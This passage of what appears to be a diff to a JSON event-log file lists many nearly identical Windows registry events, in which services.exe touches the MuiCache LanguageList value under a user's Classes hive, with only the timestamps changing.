"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 